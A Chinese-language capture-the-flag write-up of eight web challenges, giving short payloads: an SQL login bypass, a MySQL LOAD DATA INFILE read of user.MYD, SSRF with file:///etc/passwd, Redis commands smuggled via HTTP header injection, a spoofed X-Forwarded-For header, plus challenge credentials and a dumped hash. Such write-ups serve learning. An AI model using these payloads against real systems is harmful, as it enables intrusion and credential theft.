文章目录
  1. 1. BaseInjection
  2. 2. BaseReconstrction
  3. 3. Counting Stars
  4. 4. Invisible
  5. 5. Normal_normal
  6. 6. DBexplorer
  7. 7. RotatePicture
  8. 8. AdminLogin

跟着老司机学着打的..名次就不提了= =

BaseInjection

万能密码
post: username=admin’||1#&password=aaa

BaseReconstrction

重构, payload和BaseInjection相同

Counting Stars

查看备注=> mac备份 .DS_Store
hex分析发现一个zip: epLF1rEihQp5AjCUcgGry330jkFSC1C7.zip
kali中binwalk跑一下发现如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$S="song";
$song="says";
$says="no";
$no="more";
$more="d0llars";
$d0llars="counting";
$counting="star";
$star="S";
echo '<div style="text-align:center">What is $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S</div>';
?>
<br>
<br>
<br>
<div style="text-align:center">
<form action="check.php" method="post">
<input type="text" name="answer" value="" />
<input type="submit" value="submit" />
</form>
<div>

这个代码吧里面的$那拉出来echo一下就行了…
那么向check.php发个请求包即可(用的postman), post数据为 ‘answser=d0llars’

Invisible

添加头X-FORWORDED-FOR

Normal_normal

phpwind + phpbb 的模板, 两个后台地址: /phpwind/admin.php /admin.php 不知道几个意思..
通过发帖人进行社工, 找到:
帐号zhangrendao密码zhang2010
通过wooyun这篇文章直接getshell
不过简单的菜刀连接不能用(token限制)
最后通过的是目录遍历搞得2333

DBexplorer

有了提示才懂233
vim的缓存文件.db.php.swp找到phpmyadmin地址和帐号密码
username:ctfdb password:ctfmysql123
提示有user.MYD, 然后有个文件读写权限的库test..
还有个@@datadir也是学到了, (我还是自己find出来手工测试的地址…)

payload
LOAD DATA INFILE ‘/var/lib/mysql/mysql/user.MYD’ INTO TABLE q fields terminated by ‘LINES’ TERMINATED BY ‘\0’

也认识了一些文件读取命令: 大文件LOAD DATA INFILE | Pt-fifo-split 一般文件 | load_file
至于load_file为什么不能读user.MYD我也不是很懂了…

后面就是简单的登录就行了

RotatePicture

提示:urlopen file schema
相关: SSRF file协议
(一开始还想上传漏洞什么的)

file:///etc/passwd #单行显示
file:///views.py # 找到了一个地址/getredisvalue

找到了内网端口6379, 通过Python urllib HTTP Header Injection进行内网的rediis攻击
Reference: wooyun
TSRC

paylaod
http://127.0.0.1
set c46fb8d3-6322-42ba-8919-dc4b914714db 123
:6379

uuid: c46fb8d3-6322-42ba-8919-dc4b914714db 12345

AdminLogin

(这个我想吐槽.. ip到底怎么检测的…)
注入地址: /news.php?newsid=1 插件还是ff的hackerbar比较友好..添加一个referer: http://question9.erangelab.com/index.php
由于可以直接爆库报表爆字段, 那就直接给答案好了(mysql的):

1
2
3
4
5
6
ctfphp
>admin ; news
>id,name,pass ; id,title,content

ctfadmin
a2224f1bf263d26bab1994723f7565a3(administrat0r)

期间主办方默默的改了ip.. 跪了
postman ==> http://121.195.186.238/xnucactfwebadmin/logincheck.php
postdata: username, password ,submit
加一个header:

文章目录
  1. 1. BaseInjection
  2. 2. BaseReconstrction
  3. 3. Counting Stars
  4. 4. Invisible
  5. 5. Normal_normal
  6. 6. DBexplorer
  7. 7. RotatePicture
  8. 8. AdminLogin